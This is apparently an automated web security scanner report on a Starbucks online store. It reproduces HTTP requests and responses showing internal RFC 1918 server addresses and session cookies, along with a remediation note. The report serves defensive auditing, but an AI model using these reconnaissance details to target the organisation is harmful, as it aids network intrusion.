HTTP/1.1 200 OK Content-Type: application/x-javascript Last-Modified: Mon, 04 Oct 2010 20:52:53 GMT Accept-Ranges: bytes ETag: "17df8d1d664cb1:0" Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:12:36 GMT Content-Length: 30097
/* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+ <http://cherne.net/brian/resources/jquery.hoverIntent.html> @param f onMouseOver function || An object with configuration options @param g onMo ...[SNIP]... <brian@cherne.net> ...[SNIP]...
HTTP/1.1 200 OK Content-Type: application/x-javascript Last-Modified: Wed, 09 Dec 2009 20:01:41 GMT Accept-Ranges: bytes ETag: "b57fbf6ca79ca1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:11:50 GMT Content-Length: 24837
//---------------------------------------------------------------------------- // Filename: /GuestAssist/guestassist_jscript.js // Description: this file contains the Guest Assistance subject and t ...[SNIP]... ------------------- --------------- -----------rac arrSubTopics = new Array( new Array(new Array("", "", "", 0, "order")), new Array(new Array("I need help tracking my order", "orders@starbucksstore.com", "Order Inquiries - Tracking", 1, "order"), new Array("I need to cancel or change my order", "orderchanges@starbucksstore.com", "Order Inquiries - Cancellations/Changes", 2, "order"), new Array("I need help with an order I received.", "orders@starbucksstore.com", "Order Inquiry - Fullfillment Issue", 3, "order"), new Array("Other", "orders@starbucksstore.com", "Order Inquiries - Other", 4, "order")),
new Array(new Array("How do I subscribe to the StarbucksStore newsletter?", "support@starbucksstore.com", "Newsletters - Subscribe", 1, "other"), new Array("I need to change my email address.", "support@starbucksstore.com", "Newsletters - Change Address", 2, "other"), new Array("Other", "support@starbucksstore.com", "Newsletters - Other", 3, "other")),
new Array( new Array("How do I pay for my order?", "support@starbucksstore.com", "Shopping - Payment Options", 1, "other"), new Array("How do I complete my order?", "support@starbucksstore.com", "Shopping - Checkout", 2, "other"), new Array("Is your website secure?", "support@starbucksstore.com", "Shopping - Security", 3, "other"), new Array("What do you do with my private information?", "support@starbucksstore.com", "Shopping - Privacy", 4, "other"), new Array("Do you have special offers or coupons?", "support@starbucksstore.com", "Shopping - Special Offers/Discounts", 5, "other"), new Array("Other", "support@starbucksstore.com", "Shopping - Other", 6, "other")),
new Array(new Array("Shipping options and rates.", "support@starbucksstore.com", "Shipping - Options/Rates", 1, "other"), new Array("Do you ship to international locations?", "support@starbucksstore.com", "Shipping - International", 2, "other"), new Array("Other", "support@starbucksstore.com", "Shipping - Other", 3, "other")),
new Array(new Array("How to return products", "returns@starbucksstore.com", "Returns - Process", 1, "returns"), new Array("When will I receive my credit?", "returns@starbucksstore.com", "Returns - Process", 2, "returns"), new Array("Have you received a product I recently returned?", "returns@starbucksstore.com", "Returns - Inquiry", 3, "returns"), new Array("Other", "returns@starbucksstore.com", "Returns - Other", 4, "returns")),
new Array(new Array("Questions about coffee origins.", "products@starbucksstore.com", "Product - General Information", 1, "other"), new Array("Where do I find nutrition information?", "products@starbucksstore.com", "Product - General Information", 2, "other"), new Array("Question about coffee.", "info@starbucks.com", "Product - General Information", 3, "other"), new Array("Question about coffee accessories.", "info@starbucks.com", "Product - General Information", 4, "other"), new Array("Question about other Starbucks products.", "info@starbucks.com", "Product - General Information", 5, "other"), new Array("Replacement parts or product warranty.", "info@starbucks.com", "Product - General Information", 6, "other"), new Array("Question about Starbucks Music", "info@starbucks.com", "Product - General Information", 7, "other"), new Array("Other", "products@starbucksstore.com", "Product - Other", 8, "other")),
new Array(new Array("Why is an account required?", "support@starbucksstore.com", "My Account - Required", 1, "other"), new Array("I forgot my password.", "support@starbucksstore.com", "My Account - Forgot Password", 2, "other"), new Array("How can I change my personal information?", "support@starbucksstore.com", "My Account - Update Email Address", 3, "other"), new Array("How do I create an account?", "support@starbucksstore.com", "My Account - Creating", 4, "other"), new Array("How do I modify my address book?", "support@starbucksstore.com", "My Account - Address Book", 5, "other"), new Array("What do you do with my private information?", "support@starbucksstore.com", "My Account - Privacy", 6, "other"), new Array("May I automatically reorder?", "orders@starbucksstore.com", "My Account - Automatic Reorder", 7, "other"), new Array("Reset my password", "support@starbucksstore.com", "My Account - Reset my password", 8, "other"), new Array("Change my email address", "support@starbucksstore.com", "My Account - Change my email address", 9, "other"), new Array("Help creating an account", "support@starbucksstore.com", "My Account - Help creating an account", 10, "other"), new Array("Modify my address information", "support@starbucksstore.com", "My Account - Modify my address information", 11, "other")),
new Array( new Array("Error message during checkout.", "support@starbucksstore.com", "Technical Support - Error message during checkout", 1, "other"), new Array("Other error message.", "support@starbucksstore.com", "Technical Support - Other error message", 2, "other"), new Array("Something looks wrong on my screen.", "support@starbucksstore.com", "Technical Support - Something looks wrong on my screen", 3, "other"), new Array("Printing problems.", "support@starbucksstore.com", "Technical Support - Printing problems", 3, "other"), new Array("I cannot complete my order.", "support@starbucksstore.com", "Technical Support - I cannot complete my order", 4, "other"), new Array("I received an error message.", "support@starbucksstore.com", "Technical Support - Error Message", 5, "other"), new Array("Other", "support@starbucksstore.com", "Technical Support - Other", 6, "other")),
new Array( new Array("How do I purchase a gift certificate?", "support@starbucksstore.com", "GC - Purchase GC", 1, "other"), new Array("Starbucks card", "info@starbucks.com", "GC - Starbucks Card", 2, "other"), new Array("How do I get coupons?", "support@starbucksstore.com", "GC - Coupons", 3, "other"), new Array("Problem using my gift certificate", "support@starbucksstore.com", "GC - Using GC", 4, "other"), new Array("Problem using my coupon", "support@starbucksstore.com", "GC - Coupon", 5, "other")),
new Array(new Array("Where do I send Marketing proposals?", "support@starbucksstore.com", "Business Services - Marketing", 1, "other"), new Array("Where do I send product samples?", "support@starbucksstore.com", "Business Services - Samples", 2, "other"), new Array("Do you have an Affiliate Program?", "support@starbucksstore.com", "Business Services - Affiliate Program", 3, "other"), new Array("Do you have an automatic reorder program?", "support@starbucksstore.com", "Business Services - Automatic Reorder", 4, "other"), new Array("May we advertise on your site?", " advertising@starbucksstore.com", "Business Services - Advertising", 5, "other"), new Array("Public Relations/Media Inquiries", "pr@starbucksstore.com", "Public Relations/Media Inquiries", 6, "other")),
new Array(new Array("General Information", "info@starbucks.com", "General Information", 1, "other"), new Array("Starbucks grocery products.", "info@starbucks.com", "Starbucks Grocery Products", 2, "other"), new Array("Starbucks card corporate sales", "info@starbucks.com", "Starbucks Card Corporate Sales", 3, "other"), new Array("Starbucks card", "info@starbucks.com", "Starbucks Card General Information", 4, "other"), new Array("International Development & Overseas Partnership Opportunities", "info@starbucks.com", "International Development & Overseas Partnership Opportunities", 5, "other"), new Array("Starbucks.com", "info@starbucks.com", "General", 6, "other"), new Array("Retail store feedback", "info@starbucks.com", "Retail Store Feedback", 7, "other"), new Array("International Retail store feedback", "info@starbucks.com", "International Retail Store Feedback", 8, "other"), new Array("Hear Music feedback", "info@starbucks.com", "Hear Music Feedback", 9, "other")),
new Array(new Array("I have feedback about a product.", "support@starbucksstore.com", "Feedback - Products", 1, "other"), new Array("I have feedback about this website.", "support@starbucksstore.com", "Feedback - Website", 2, "other"), new Array("I have general feedback.", "support@starbucksstore.com", "Feedback - Other", 3, "other"), new Array("Retail store feedback", "info@starbucks.com", "Retail Store Feedback", 4, "other"), new Array("International Retail store feedback", "info@starbucks.com", "International Retail Store Feedback", 5, "other"), new Array("Hear Music feedback", "info@starbucks.com", "Hear Music Feedback", 6, "other")),
new Array(new Array("Advertising", "support@starbucksstore.com", "Advertising - General", 1, "other")),
////////////////////////////////////////////////////////////////////////////// // // Name fillSelectFromArray // Description A function that takes ...[SNIP]...
12. Private IP addresses disclosedpreviousnext There are 27 instances of this issue:
RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.
Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.
Issue remediation
There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21201 Content-Type: text/html Server: Microsoft-IIS/7.0 Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:18:41 GMT
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" content="F ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="HomePage" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/default.asp?CCAID=SBPTPAHP1SHT ...[SNIP]...
HTTP/1.1 200 OK Cache-Control: private Content-Length: 14191 Content-Type: text/html Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDSAADCCCB=NGKAELCBMACFABOABHGPBGCG; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:32:40 GMT
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/guestassist/poweredbycooking.asp" var s_setRef="" var s_server="10.11.5.101" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/poweredbycooking.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/p ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /GuestAssist/poweredbycooking.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 14191 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:21 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/guestassist/poweredbycooking.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/poweredbycooking.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/p ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /StarbucksCard/default.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 19809 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:43:37 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="Starbucks Card HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Card HomePage" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/starbuckscard/d ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /coffee-machines/ HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21084 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:35:58 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="Equipment Homepage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Equipment Homepage" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/coffee-machines/defa ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /default.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21174 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:43:40 GMT Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" content="F ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="HomePage" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/default.asp" var s_prop7="" ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /entertainment/ HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 16333 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:42:31 GMT Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" conte ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="Starbucks Entertainment" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Entertainment" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/entertainment/d ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /extras/newsletters.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 16315 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:43:12 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/extras/newsletters.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/extras/newsletters.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/extras/newsletters.asp" ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /guestassist/ga_faq_shipop.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 42716 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:01 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/guestassist/ga_faq_shipop.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/ga_faq_shipop.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/ga_f ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /guestassist/gareturns.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 15036 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:11 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/guestassist/gareturns.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/gareturns.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/gareturn ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /guestassist/shcontus.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 20601 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:36:57 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/guestassist/shcontus.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/shcontus.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/shcontus. ...[SNIP]...
HTTP/1.1 200 OK Cache-Control: private Content-Length: 20601 Content-Type: text/html Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDSAADCCCB=IMPPDLCBFMIGCMOPJPJFLFOO; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:21:14 GMT
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/guestassist/shcontus.asp" var s_setRef="" var s_server="10.11.5.101" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/shcontus.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/shcontus. ...[SNIP]...
HTTP/1.1 200 OK Cache-Control: private Content-Length: 20694 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:12:46 GMT
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/guestassist/shcontus.asp" var s_setRef="" var s_server="10.11.5.108" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/shcontus.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/shcontus. ...[SNIP]...
HTTP/1.1 200 OK Cache-Control: private Content-Length: 12588 Content-Type: text/html Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDSAADCCCB=HCCBELCBGFGJAEFDAFOHNILL; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:39:41 GMT
<!--S1--><!--S0-->
<!-- Common Function include file -->
<!-- EMail include file -->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HT ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/guestassist/shgaemailconfirm.asp" var s_setRef="" var s_server="10.11.5.101" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/shgaemailconfirm.asp" var s_prop3="SBDIRECT" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/shgaem ...[SNIP]...
HTTP/1.1 200 OK Cache-Control: private Content-Length: 16848 Content-Type: text/html Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDSCDCCADA=JDPAELCBMFLNOOGBJGPPEOAB; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:36:18 GMT
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/guestassist/shgaform.asp" var s_setRef="" var s_server="10.11.5.101" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/shgaform.asp" var s_prop3="SBDIRECT" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/shgaform.asp" ...[SNIP]...
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Cont ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/mya/links.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/mya/links.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/mya/links.asp" var s_prop7="" ...[SNIP]...
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Cont ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/mya/track.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/mya/track.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/mya/track.asp" var s_prop7="" ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /products/shabotus.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 14434 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:39:33 GMT Connection: close
<!--S1--><!--S0-->
